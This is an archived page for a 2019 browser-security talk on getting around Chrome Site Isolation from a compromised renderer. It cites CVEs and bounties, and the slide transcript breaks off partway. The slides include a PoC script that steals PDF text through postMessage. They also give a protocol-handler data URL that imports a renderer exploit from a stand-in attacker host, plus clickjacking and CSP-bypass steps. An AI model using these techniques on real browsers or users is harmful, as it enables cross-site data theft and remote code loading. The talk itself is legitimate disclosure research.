---
type: Slides
title: The world of Site Isolation and compromised renderer
description: "Shows what an attacker who has already compromised a Chrome renderer process can still reach despite Site Isolation: spoofed-origin postMessage steals PDF text, registerProtocolHandler and Reader mode enforce their checks only in the renderer, and extension message listeners answer content scripts. Chained, these read cross-site data, open arbitrary file URLs and bypass CSP."
resource: "https://speakerdeck.com/shhnjk/the-world-of-site-isolation-and-compromised-renderer"
tags: [slides, webseclist-reference, en, speaker-deck, sandbox-escape, sop-bypass, browser-extension, postmessage, info-leak, csp, same-origin-policy, pdf, attack-chain, cve, owasp-a01-2021, owasp-a05-2021]
generated:
  by: webseclist-refs/1
  at: "2026-08-10T16:00:52+00:00"
status: stable
stale_after: 2027-08-10
sources:
  - id: original
    resource: "https://speakerdeck.com/shhnjk/the-world-of-site-isolation-and-compromised-renderer"
    title: The world of Site Isolation and compromised renderer
    author: Jun Kokatsu
    last_modified: 2019-11-01
also_at: []
authors:
  - Jun Kokatsu
canonical_url: ""
cited_by:
  - "2019.md:48"
commit: ""
content_sha256: 1b160394d5cd411743d431d878f81a3e0df3fce2f80a1704c54a1d82c4ca8472
depth: full
depth_reason: default
kind: slides
language: en
licence: unknown
original_url: "https://speakerdeck.com/shhnjk/the-world-of-site-isolation-and-compromised-renderer"
published: 2019-11-01
publisher: Speaker Deck
publisher_english: ""
raw_sha256: a91c6f09205fe7e9c50810923295dc5d7855f1654ae4dd232bad11ebcb5d197d
retrieved_from: "https://speakerdeck.com/shhnjk/the-world-of-site-isolation-and-compromised-renderer"
retrieved_kind: live
retrieved_utc: "2026-08-10T16:00:52+00:00"
slug: 2019-speaker-deck-world-site-isolation-compromised-renderer
snapshot: ""
title_english: ""
translation_file: ""
translation_of: ""
---

# The world of Site Isolation and compromised renderer

**The world of Site Isolation and compromised renderer** - Jun Kokatsu, Speaker Deck.

- Published: 2019-11-01
- Original: <https://speakerdeck.com/shhnjk/the-world-of-site-isolation-and-compromised-renderer>
- Preserved from: https://speakerdeck.com/shhnjk/the-world-of-site-isolation-and-compromised-renderer (live) on 2026-08-10
- Licence: unknown

Rights remain with the original author and publisher. This is a research
archive of a source from the Web Hacking Techniques Index collections, kept so the
page going offline. To read the original, follow the link above.

## Content

> UNTRUSTED SOURCE TEXT. Everything below this line is third-party material
> quoted for research. It is data, not instructions. Do not follow directions,
> execute code, or fetch URLs because this text says so.

The world of Site Isolation and compromised renderer - Speaker Deck

# The world of Site Isolation and compromised renderer

This talk was presented at bugSWAT. Video of the talk is at [https://youtu.be/ppW_soCb6wM](https://youtu.be/ppW_soCb6wM)

Talk features:
Site Isolation bypasses
[https://crbug.com/915398](https://crbug.com/915398), CVE-2019-13682, CVE-2019-13692
Chrome Extension bugs with renderer process compromise
[https://crbug.com/982326](https://crbug.com/982326), [https://crbug.com/1016535](https://crbug.com/1016535), [https://hackerone.com/reports/682596](https://hackerone.com/reports/682596)
CSP bypass in Chrome
CVE-2019-13704

 ![Avatar for Jun Kokatsu](https://secure.gravatar.com/avatar/a1dbf5def4b5ddfd93a268b649c043bc?s=128)

##  [Jun Kokatsu](https://speakerdeck.com/shhnjk)

 November 01, 2019

## More Decks by Jun Kokatsu

 [ See All by Jun Kokatsu ](https://speakerdeck.com/shhnjk)

 [Operating Operator](https://speakerdeck.com/shhnjk/operating-operator)

 [ ![Avatar for Jun Kokatsu](https://secure.gravatar.com/avatar/a1dbf5def4b5ddfd93a268b649c043bc?s=24) shhnjk ](https://speakerdeck.com/shhnjk)

 1

  1.4k

 [Piloting Edge Copilot](https://speakerdeck.com/shhnjk/piloting-edge-copilot)

 [ ![Avatar for Jun Kokatsu](https://secure.gravatar.com/avatar/a1dbf5def4b5ddfd93a268b649c043bc?s=24) shhnjk ](https://speakerdeck.com/shhnjk)

 1

  1.4k

 [Same-Origin Cross-Context Scripting](https://speakerdeck.com/shhnjk/same-origin-cross-context-scripting)

 [ ![Avatar for Jun Kokatsu](https://secure.gravatar.com/avatar/a1dbf5def4b5ddfd93a268b649c043bc?s=24) shhnjk ](https://speakerdeck.com/shhnjk)

 0

  1.1k

 [Site Isolationの話](https://speakerdeck.com/shhnjk/site-isolationfalsehua)

 [ ![Avatar for Jun Kokatsu](https://secure.gravatar.com/avatar/a1dbf5def4b5ddfd93a268b649c043bc?s=24) shhnjk ](https://speakerdeck.com/shhnjk)

 5

  2.1k

 [ブラウザセキュリティ機能は バイパスされる為にある](https://speakerdeck.com/shhnjk/burauzasekiyuriteiji-neng-ha-baipasusareruwei-niaru)

 [ ![Avatar for Jun Kokatsu](https://secure.gravatar.com/avatar/a1dbf5def4b5ddfd93a268b649c043bc?s=24) shhnjk ](https://speakerdeck.com/shhnjk)

 8

  4.1k

 [Logically Bypassing Browser Security Boundaries](https://speakerdeck.com/shhnjk/logically-bypassing-browser-security-boundaries)

 [ ![Avatar for Jun Kokatsu](https://secure.gravatar.com/avatar/a1dbf5def4b5ddfd93a268b649c043bc?s=24) shhnjk ](https://speakerdeck.com/shhnjk)

 5

  3.5k

## Other Decks in Research

 [ See All in Research ](https://speakerdeck.com/c/research)

 [某助成金プロジェクト採択に向けて企業研究所のアウトリーチ専任者がやったこと](https://speakerdeck.com/afroscript/mou-zhu-cheng-jin-puroziekutocai-ze-nixiang-keteqi-ye-yan-jiu-suo-noautoritizhuan-ren-zhe-gayatutakoto)

 [ ![Avatar for afroscript](https://secure.gravatar.com/avatar/e2b467a18ec383cfa0068207e43df7fa?s=24) afroscript ](https://speakerdeck.com/afroscript)

 0

  160

 [Language and AI](https://speakerdeck.com/ayaniwa/language-and-ai)

 [ ![Avatar for Ayana Niwa](https://secure.gravatar.com/avatar/7d5c4656c947d0905dfbc5e39f233857?s=24) ayaniwa ](https://speakerdeck.com/ayaniwa)

 0

  190

 [Sleuthcon Keynote - How Cybercriminals (ab)use AI](https://speakerdeck.com/fr0gger/sleuthcon-keynote-how-cybercriminals-ab-use-ai)

 [ ![Avatar for Thomas Roccia](https://secure.gravatar.com/avatar/9103dacbfc728d2a583981e7cf854cc4?s=24) fr0gger ](https://speakerdeck.com/fr0gger)

 0

  280

 [大規模言語モデルは誰を覚えているか / Who Do Large Language Models Memorize?](https://speakerdeck.com/upura/who-do-large-language-models-memorize)

 [ ![Avatar for Shotaro Ishihara](https://secure.gravatar.com/avatar/b1cc148711c6a37a5c922b6e72a4ad52?s=24) upura ](https://speakerdeck.com/upura)

 0

  110

 [LA-Bench 2025：実験指示から実行可能手順を生成するためのデータセット/LA-Bench 2025: A Dataset for Generating Executable Experimental Procedures from Experimental Instructions](https://speakerdeck.com/stktu/la-bench-2025-a-dataset-for-generating-executable-experimental-procedures-from-experimental-instructions)

 [ ![Avatar for Shota Kato](https://secure.gravatar.com/avatar/d60dc42bf3b7ad6628b0e67527f441b6?s=24) stktu ](https://speakerdeck.com/stktu)

 0

  120

 [ScoreMatchingRiesz for Automatic Debiased Machine Learning and Policy Path Estimation with an Application to Japanese Monetary Policy Evaluation](https://speakerdeck.com/masakat0/scorematchingriesz-for-automatic-debiased-machine-learning-and-policy-path-estimation-with-an-application-to-japanese-monetary-policy-evaluation)

 [ ![Avatar for MasaKat0](https://secure.gravatar.com/avatar/bb6c3fc8c577710c72d03aeb4fa56bf6?s=24) masakat0 ](https://speakerdeck.com/masakat0)

 0

  310

 [260624_NLP-colloquium: Hubness](https://speakerdeck.com/de9uch1/260624-nlp-colloquium-hubness)

 [ ![Avatar for Hiroyuki Deguchi](https://secure.gravatar.com/avatar/b30b28a835b61eff03d0e09336cb8418?s=24) de9uch1 ](https://speakerdeck.com/de9uch1)

 1

  170

 [LINEヤフー データサイエンス Meetup「三井物産コモディティ予測チャレンジ」の舞台裏-AlpacaTechパート](https://speakerdeck.com/gamella/lineyahu-detasaiensu-meetup-san-jing-wu-chan-komodeiteiyu-ce-tiyarenzi-nowu-tai-li-alpacatechpato)

 [ ![Avatar for tomo](https://secure.gravatar.com/avatar/3e8f61263f14a620f21d5f3f89c4b846?s=24) gamella ](https://speakerdeck.com/gamella)

 1

  620

 [Sequences of Logits Reveal the Low Rank Structure of Language Models](https://speakerdeck.com/sansantech/20260325-1)

 [ ![Avatar for SansanTech](https://speakerdeck.com/rails/active_storage/representations/redirect/eyJfcmFpbHMiOnsiZGF0YSI6NTQyMCwicHVyIjoiYmxvYl9pZCJ9fQ==--688da104aaf03ce13c8194bda634b039c1aa4b80/eyJfcmFpbHMiOnsiZGF0YSI6eyJmb3JtYXQiOiJwbmciLCJyZXNpemVfdG9fZmlsbCI6WzI0LDI0XX0sInB1ciI6InZhcmlhdGlvbiJ9fQ==--924ecf2834d46e1be7416cc0ef8ce19d4bbdebbf/icon_engnr_dev_256.png) sansantech ](https://speakerdeck.com/sansantech)

 [PRO](https://speakerdeck.com/pro?utm_campaign=PRO&utm_medium=web&utm_source=user_pro_badge)

 1

  300

 [データサイエンティストの就労意識～2015 → 2026 一般(個人)会員アンケートより](https://speakerdeck.com/datascientistsociety/person_research2026)

 [ ![Avatar for The Japan DataScientist Society](https://speakerdeck.com/rails/active_storage/representations/redirect/eyJfcmFpbHMiOnsiZGF0YSI6MTIzNTQwLCJwdXIiOiJibG9iX2lkIn19--e7fb496bc4dbfa06df97780a1177e76d52344cba/eyJfcmFpbHMiOnsiZGF0YSI6eyJmb3JtYXQiOiJqcGciLCJyZXNpemVfdG9fZmlsbCI6WzI0LDI0XX0sInB1ciI6InZhcmlhdGlvbiJ9fQ==--dcc78b2290da0fc746e1bfe817edcd08056147b6/da-logo%E3%81%AE%E3%81%BF%EF%BC%88%E5%95%86%E6%A8%99%E7%99%BB%E9%8C%B2%E7%94%A8%EF%BC%89.jpg) datascientistsociety ](https://speakerdeck.com/datascientistsociety)

 [PRO](https://speakerdeck.com/pro?utm_campaign=PRO&utm_medium=web&utm_source=user_pro_badge)

 0

  580

 [Anthropic が提案する LLM の内部状態を自然言語で説明可能にした Natural Language Autoencoders / Natural Language Autoencoders Produce Unsupervised Explanations of LLM Activations](https://speakerdeck.com/shunk031/natural-language-autoencoders-produce-unsupervised-explanations-of-llm-activations)

 [ ![Avatar for Shunsuke KITADA](https://secure.gravatar.com/avatar/5bea5748e87ba7a12c2f4a8595672366?s=24) shunk031 ](https://speakerdeck.com/shunk031)

 0

  160

 [AIエージェント時代のLLM-jpモデルのあるべき姿](https://speakerdeck.com/k141303/aiezientoshi-dai-nollm-jpmoderunoarubekizi)

 [ ![Avatar for Kouta Nakayama](https://secure.gravatar.com/avatar/8236376240946d9c4868e3473d155600?s=24) k141303 ](https://speakerdeck.com/k141303)

 0

  550

## Featured

 [ See All Featured ](https://speakerdeck.com/p/featured)

 [Game over? The fight for quality and originality in the time of robots](https://speakerdeck.com/wayneb77/game-over-the-fight-for-quality-and-originality-in-the-time-of-robots)

 [ ![Avatar for Wayne Barker](https://speakerdeck.com/rails/active_storage/representations/redirect/eyJfcmFpbHMiOnsiZGF0YSI6MTk3NzAsInB1ciI6ImJsb2JfaWQifX0=--c5a71c6f5132c036855cdbb1284df957d9c907da/eyJfcmFpbHMiOnsiZGF0YSI6eyJmb3JtYXQiOiJqcGciLCJyZXNpemVfdG9fZmlsbCI6WzI0LDI0XX0sInB1ciI6InZhcmlhdGlvbiJ9fQ==--dcc78b2290da0fc746e1bfe817edcd08056147b6/DilBtLhG_400x400.jpg) wayneb77 ](https://speakerdeck.com/wayneb77)

 1

  240

 [Site-Speed That Sticks](https://speakerdeck.com/csswizardry/site-speed-that-sticks)

 [ ![Avatar for Harry Roberts](https://speakerdeck.com/rails/active_storage/representations/redirect/eyJfcmFpbHMiOnsiZGF0YSI6MjkxMzksInB1ciI6ImJsb2JfaWQifX0=--8e101a64c4b4cc0fe17b319fa4fb35624590c38b/eyJfcmFpbHMiOnsiZGF0YSI6eyJmb3JtYXQiOiJqcGciLCJyZXNpemVfdG9fZmlsbCI6WzI0LDI0XX0sInB1ciI6InZhcmlhdGlvbiJ9fQ==--dcc78b2290da0fc746e1bfe817edcd08056147b6/labin-square.jpg) csswizardry ](https://speakerdeck.com/csswizardry)

 13

  1.4k

 [Making Projects Easy](https://speakerdeck.com/brettharned/making-projects-easy)

 [ ![Avatar for Brett Harned](https://secure.gravatar.com/avatar/c4de88ea47538e4594750e3861a341c8?s=24) brettharned ](https://speakerdeck.com/brettharned)

 120

  6.7k

 [What's in a price? How to price your products and services](https://speakerdeck.com/michaelherold/whats-in-a-price-how-to-price-your-products-and-services)

 [ ![Avatar for Michael Herold](https://secure.gravatar.com/avatar/dad095ea7038f89f760419ce475d5d14?s=24) michaelherold ](https://speakerdeck.com/michaelherold)

 247

  13k

 [Rebuilding a faster, lazier Slack](https://speakerdeck.com/samanthasiow/rebuilding-a-faster-lazier-slack)

 [ ![Avatar for samanthasiow](https://secure.gravatar.com/avatar/c0b42577cfc2b321be3474618107e933?s=24) samanthasiow ](https://speakerdeck.com/samanthasiow)

 85

  9.6k

 [Sam Torres - BigQuery for SEOs](https://speakerdeck.com/techseoconnect/sam-torres-bigquery-for-seos)

 [ ![Avatar for Tech SEO Connect](https://speakerdeck.com/rails/active_storage/representations/redirect/eyJfcmFpbHMiOnsiZGF0YSI6MTQ2NjU4LCJwdXIiOiJibG9iX2lkIn19--14f297c27d2190051dc109b5d472cf0297dd6c3e/eyJfcmFpbHMiOnsiZGF0YSI6eyJmb3JtYXQiOiJwbmciLCJyZXNpemVfdG9fZmlsbCI6WzI0LDI0XX0sInB1ciI6InZhcmlhdGlvbiJ9fQ==--924ecf2834d46e1be7416cc0ef8ce19d4bbdebbf/40575_logo_social%20media%20profile%204.png) techseoconnect ](https://speakerdeck.com/techseoconnect)

 [PRO](https://speakerdeck.com/pro?utm_campaign=PRO&utm_medium=web&utm_source=user_pro_badge)

 0

  460

 [Leveraging Curiosity to Care for An Aging Population](https://speakerdeck.com/cassininazir/leveraging-curiosity-to-care-for-an-aging-population)

 [ ![Avatar for Cassini Nazir](https://secure.gravatar.com/avatar/4631d364d59bd9d045acf046a0ce1cfe?s=24) cassininazir ](https://speakerdeck.com/cassininazir)

 1

  460

 [How People are Using Generative and Agentic AI to Supercharge Their Products, Projects, Services and Value Streams Today](https://speakerdeck.com/helenjbeal/how-people-are-using-generative-and-agentic-ai-to-supercharge-their-products-projects-services-and-value-streams-today)

 [ ![Avatar for Helen Beal](https://speakerdeck.com/rails/active_storage/representations/redirect/eyJfcmFpbHMiOnsiZGF0YSI6NDc4NzcyLCJwdXIiOiJibG9iX2lkIn19--63c34c899ae9696f1fd5abddc34acfa182481f9d/eyJfcmFpbHMiOnsiZGF0YSI6eyJmb3JtYXQiOiJwbmciLCJyZXNpemVfdG9fZmlsbCI6WzI0LDI0XX0sInB1ciI6InZhcmlhdGlvbiJ9fQ==--924ecf2834d46e1be7416cc0ef8ce19d4bbdebbf/Helen%20Beal%20(white%20jacket).png) helenjbeal ](https://speakerdeck.com/helenjbeal)

 1

  260

 [ReactJS: Keep Simple. Everything can be a component!](https://speakerdeck.com/pedronauck/reactjs-keep-simple-everything-can-be-a-component)

 [ ![Avatar for Pedro Nauck](https://secure.gravatar.com/avatar/af6a12710770ad9a7cfd08c97efd40d3?s=24) pedronauck ](https://speakerdeck.com/pedronauck)

 666

  130k

 [More Than Pixels: Becoming A User Experience Designer](https://speakerdeck.com/marktimemedia/more-than-pixels-becoming-a-user-experience-designer)

 [ ![Avatar for Michelle Schulp Hunt](https://secure.gravatar.com/avatar/e195ae45320d9202eaa01c9f1d31a416?s=24) marktimemedia ](https://speakerdeck.com/marktimemedia)

 3

  480

 [Getting science done with accelerated Python computing platforms](https://speakerdeck.com/jacobtomlinson/getting-science-done-with-accelerated-python-computing-platforms)

 [ ![Avatar for Jacob Tomlinson](https://secure.gravatar.com/avatar/ca3d0556227d66b3c15be1eadf69473b?s=24) jacobtomlinson ](https://speakerdeck.com/jacobtomlinson)

 2

  400

 [What does AI have to do with Human Rights?](https://speakerdeck.com/axbom/what-does-ai-have-to-do-with-human-rights)

 [ ![Avatar for Per Axbom](https://speakerdeck.com/rails/active_storage/representations/redirect/eyJfcmFpbHMiOnsiZGF0YSI6MzA4MTcsInB1ciI6ImJsb2JfaWQifX0=--3b22ae95c7f24edaeb9c2d37fdb67f05b7db6128/eyJfcmFpbHMiOnsiZGF0YSI6eyJmb3JtYXQiOiJqcGciLCJyZXNpemVfdG9fZmlsbCI6WzI0LDI0XX0sInB1ciI6InZhcmlhdGlvbiJ9fQ==--dcc78b2290da0fc746e1bfe817edcd08056147b6/axbom-ind08b.jpg) axbom ](https://speakerdeck.com/axbom)

 [PRO](https://speakerdeck.com/pro?utm_campaign=PRO&utm_medium=web&utm_source=user_pro_badge)

 1

  2.3k

## Transcript

-

###  [The world of Site Isolation and compromised renderer Jun Kokatsu](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_0.jpg)

-

###  [Changes from last year • Microsoft Edge moves to Chromium-based](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_1.jpg)

 browser All bounty goes to charity Donated $51k so far.

-

###  [Changes from last year • Microsoft Edge moves to Chromium-based](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_2.jpg)

 browser All bounty goes to charity Donated $51k so far. • Bug hunter rank went up from 124 to 35 Still pretty bad at finding web bugs in Google

-

###  [Agenda • What is a compromised renderer process and why](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_3.jpg)

 it matters • Site Isolation recap • Some Site Isolation bypasses • Bypassing Site Isolation without Site Isolation Bypass • Real world examples

-

###  [What is a compromised renderer process? • Attacker can use](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_4.jpg)

 bugs in JS engine, CSS engine, image parser, video parser, etc, to compromise a renderer process https://www.chromium.org/developers/design-documents/site-isolation

-

###  [What is a compromised renderer process? • Attacker can use](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_5.jpg)

 bugs in JS engine, CSS engine, image parser, video parser, etc, to compromise a renderer process • Once a renderer process is compromised, it could do anything within the renderer process (e.g. read any data coming into a renderer process, change IPC messages that will be sent from the renderer process, etc) https://www.chromium.org/developers/design-documents/site-isolation

-

###  [What is a compromised renderer process? • Attacker can use](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_6.jpg)

 bugs in JS engine, CSS engine, image parser, video parser, etc, to compromise a renderer process • Once a renderer process is compromised, it could do anything within the renderer process (e.g. read any data coming into a renderer process, change IPC messages that will be sent from the renderer process, etc) • Without Site Isolation, a renderer process compromise == UXSS https://www.chromium.org/developers/design-documents/site-isolation

-

###  [Why does it matter? Q: It’s browser bugs, and should](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_7.jpg)

 be fixed by the browser. So why should we care?

-

###  [Why does it matter? Q: It’s browser bugs, and should](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_8.jpg)

 be fixed by the browser. So why should we care? • There are average of 10+ bugs in each release of Chrome, that could potentially be used to compromise a renderer process*1 *1: https://www.chromium.org/Home/chromium-security/site-isolation#TOC-Motivation

-

###  [Why does it matter? Q: It’s browser bugs, and should](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_9.jpg)

 be fixed by the browser. So why should we care? • There are average of 10+ bugs in each release of Chrome, that could potentially be used to compromise a renderer process*1 • There is also Patch-gapping issue. So attacker doesn’t even need to find a bug. E.g. people had a full renderer exploit for 15+ days before patch was released to the stable*2 *1: https://www.chromium.org/Home/chromium-security/site-isolation#TOC-Motivation *2: https://blog.exodusintel.com/2019/09/09/patch-gapping-chrome/

-

###  [Why does it matter? Q: It’s browser bugs, and should](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_10.jpg)

 be fixed by the browser. So why should we care? • There are average of 10+ bugs in each release of Chrome, that could potentially be used to compromise a renderer process*1 • There is also Patch-gapping issue. So attacker doesn’t even need to find a bug. E.g. people had a full renderer exploit for 15+ days before patch was released to the stable*2 We should assume that attackers have the capability to compromise a renderer process *1: https://www.chromium.org/Home/chromium-security/site-isolation#TOC-Motivation *2: https://blog.exodusintel.com/2019/09/09/patch-gapping-chrome/

-

###  [Site Isolation Recap Site Isolation: Isolates process per “Site” =](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_11.jpg)

 Scheme + eTLD+1 https://www.example.com:443

-

###  [Site Isolation Recap Site Isolation: Isolates process per “Site” =](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_12.jpg)

 Scheme + eTLD+1 https://www.example.com:443 Cross-Origin Read Blocking: Prevents a process from accessing sensitive cross-site files without CORS satisfaction (MIME type based blacklist such as HTML, XML, JSON, PDF, ZIP, etc)

-

###  [Site Isolation caveats • Data URL inherits process from navigation](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_13.jpg)

 initiator <!-- https://www.google.com --> <iframe src=“data:text/html,<b>I live in the same process as Google</b>”>

-

###  [Site Isolation caveats • Data URL inherits process from navigation](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_14.jpg)

 initiator <!-- https://www.google.com --> <iframe src=“data:text/html,<b>I live in the same process as Google</b>”> • File: URL shares process across whole scheme, and there is no CORB in File: URL either A renderer process compromise of File URL means, attacker can steal any local files that the browser has access to.

-

###  [Site Isolation caveats • Data URL inherits process from navigation](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_15.jpg)

 initiator <!-- https://www.google.com --> <iframe src=“data:text/html,<b>I live in the same process as Google</b>”> • File: URL shares process across whole scheme, and there is no CORB in File: URL either A renderer process compromise of File URL means, attacker can steal any local files that the browser has access to. Chrome is trying to address these issues, but it’ll take sometime. https://bugs.chromium.org/p/chromium/issues/detail?id=510122 https://bugs.chromium.org/p/chromium/issues/detail?id=935045

-

###  [Finding Site Isolation bypass I made a WinDbg script that](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_16.jpg)

 can spoof renderer process’ origin and URL https://github.com/shhnjk/spoof.js

-

###  [I spoofed origin and URL, and then tried randomly calling](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_17.jpg)

 JS APIs to see if anything goes wrong

-

###  [I spoofed origin and URL, and then tried randomly calling](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_18.jpg)

 JS APIs to see if anything goes wrong Then I noticed, I can send/receive message with spoofed origin across site

-

###  [Stealing PDF content with postMessage Abusing this bug, I could](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_19.jpg)

 steal any PDF content in Chrome with messages <embed src="https://www.apple.com/mac/docs/Apple_T2_Security_Chip_Overview.pdf" type="application/pdf"> <script> window.onmessage = e => { if (e.data && e.data.type === 'getSelectedTextReply') { alert(e.data.selectedText); } }; function go(){ var embed = document.querySelector('embed'); embed.postMessage({type: 'selectAll'}); embed.postMessage({type: 'getSelectedText'}); } </script>

-

###  [Stealing PDF content with postMessage Abusing this bug, I could](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_20.jpg)

 steal any PDF content in Chrome with messages <embed src="https://www.apple.com/mac/docs/Apple_T2_Security_Chip_Overview.pdf" type="application/pdf"> <script> window.onmessage = e => { if (e.data && e.data.type === 'getSelectedTextReply') { alert(e.data.selectedText); } }; function go(){ var embed = document.querySelector('embed'); embed.postMessage({type: 'selectAll'}); embed.postMessage({type: 'getSelectedText'}); } </script> $3000

-

###  [Site Isolation bypass 2 Websites can create a protocol handler](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_21.jpg)

 for particular URL scheme navigator.registerProtocolHandler(“mailto”,“http://same-origin.url/?to=%s”,“title”)

-

###  [Site Isolation bypass 2 Websites can create a protocol handler](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_22.jpg)

 for particular URL scheme navigator.registerProtocolHandler(“mailto”,“http://same-origin.url/?to=%s”,“title”) With many restrictions ☹ 1. Scheme has to be whitelisted*1 *1: https://developer.mozilla.org/en-US/docs/Web/API/Navigator/registerProtocolHandler#Permitted_schemes

-

###  [Site Isolation bypass 2 Websites can create a protocol handler](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_23.jpg)

 for particular URL scheme navigator.registerProtocolHandler(“mailto”,“http://same-origin.url/?to=%s”,“title”) With many restrictions ☹ 1. Scheme has to be whitelisted*1 2. Destination URL has to be same-origin to the registering window *1: https://developer.mozilla.org/en-US/docs/Web/API/Navigator/registerProtocolHandler#Permitted_schemes

-

###  [Site Isolation bypass 2 Websites can create a protocol handler](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_24.jpg)

 for particular URL scheme navigator.registerProtocolHandler(“mailto”,“http://same-origin.url/?to=%s”,“title”) With many restrictions ☹ 1. Scheme has to be whitelisted*1 2. Destination URL has to be same-origin to the registering window 3. User has to accept the permission prompt *1: https://developer.mozilla.org/en-US/docs/Web/API/Navigator/registerProtocolHandler#Permitted_schemes

-

###  [Solving problems 1. Scheme has to be whitelisted Whitelist check](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_25.jpg)

 was implemented inside a renderer process, and browser process only had blacklist check related to browser schemes.

-

###  [Solving problems 1. Scheme has to be whitelisted Whitelist check](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_26.jpg)

 was implemented inside a renderer process, and browser process only had blacklist check related to browser schemes. 2. Destination URL has to be same-origin to the registering window This check was also inside a renderer process, thus completely bypassable.

-

###  [Solving problems 1. Scheme has to be whitelisted Whitelist check](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_27.jpg)

 was implemented inside a renderer process, and browser process only had blacklist check related to browser schemes. 2. Destination URL has to be same-origin to the registering window This check was also inside a renderer process, thus completely bypassable. 3. User has to accept the permission prompt Origin of permission prompt was calculated using destination URL, which could be anything with above bypass. It’ll be blank if you pass a Data URL

-

###  [But how this can be a Site Isolation bypass? 1.](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_28.jpg)

 After renderer process is compromised, register any scheme (e.g. mailto) with following destination URL data:text/html,<script>import(‘https://attacker.tld/renderer_exploit.js’)</script>

-

###  [But how this can be a Site Isolation bypass? 1.](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_29.jpg)

 After renderer process is compromised, register any scheme (e.g. mailto) with following destination URL data:text/html,<script>import(‘https://attacker.tld/renderer_exploit.js’)</script> 2. Find a webpage that has hyperlink to above scheme AND doesn’t have X-Frame-Options set

-

###  [But how this can be a Site Isolation bypass? 1.](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_30.jpg)

 After renderer process is compromised, register any scheme (e.g. mailto) with following destination URL data:text/html,<script>import(‘https://attacker.tld/renderer_exploit.js’)</script> 2. Find a webpage that has hyperlink to above scheme AND doesn’t have X-Frame-Options set 3. Clickjack target page, and wait for a user click

-

###  [But how this can be a Site Isolation bypass? 1.](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_31.jpg)

 After renderer process is compromised, register any scheme (e.g. mailto) with following destination URL data:text/html,<script>import(‘https://attacker.tld/renderer_exploit.js’)</script> 2. Find a webpage that has hyperlink to above scheme AND doesn’t have X-Frame-Options set 3. Clickjack target page, and wait for a user click 4. Data URL we set in step 1 will now execute in the process of target page

-

###  [But how this can be a Site Isolation bypass? 1.](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_32.jpg)

 After renderer process is compromised, register any scheme (e.g. mailto) with following destination URL data:text/html,<script>import(‘https://attacker.tld/renderer_exploit.js’)</script> 2. Find a webpage that has hyperlink to above scheme AND doesn’t have X-Frame-Options set 3. Clickjack target page, and wait for a user click 4. Data URL we set in step 1 will now execute in the process of target page $3000

-

###  [Site Isolation bypass 3 Reader mode chrome-distiller://9a898ff4-b0ad-45c6-8da2-bd8a6acce25d/?url=https://news.tld • Page content](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_33.jpg)

 from news.tld will be filtered, but images and videos are allowed

-

###  [Site Isolation bypass 3 Reader mode chrome-distiller://9a898ff4-b0ad-45c6-8da2-bd8a6acce25d/?url=https://news.tld • Page content](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_34.jpg)

 from news.tld will be filtered, but images and videos are allowed • GUID changes for each reader mode page

-

###  [Site Isolation bypass 3 Reader mode chrome-distiller://9a898ff4-b0ad-45c6-8da2-bd8a6acce25d/?url=https://news.tld • Page content](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_35.jpg)

 from news.tld will be filtered, but images and videos are allowed • GUID changes for each reader mode page Site Isolation assumption Ability to load an untrusted image in the target page is enough to compromise the renderer process

-

###  [What can you do with compromised Reader mode 1. Open](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_36.jpg)

 new window with victim’s site (Reader mode will cache the page) You can do this using native code (C++) or JS CSP can be bypassed because it’s enforced inside the renderer process, which you’ve already compromised chrome-distiller://[GUID]/?url=https://attacker.tld victim = “https://victim.tld” window.open(victim, “w”) https://victim.tld Super Secret Data!!!

-

###  [What can you do with compromised Reader mode 2. Navigate](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_37.jpg)

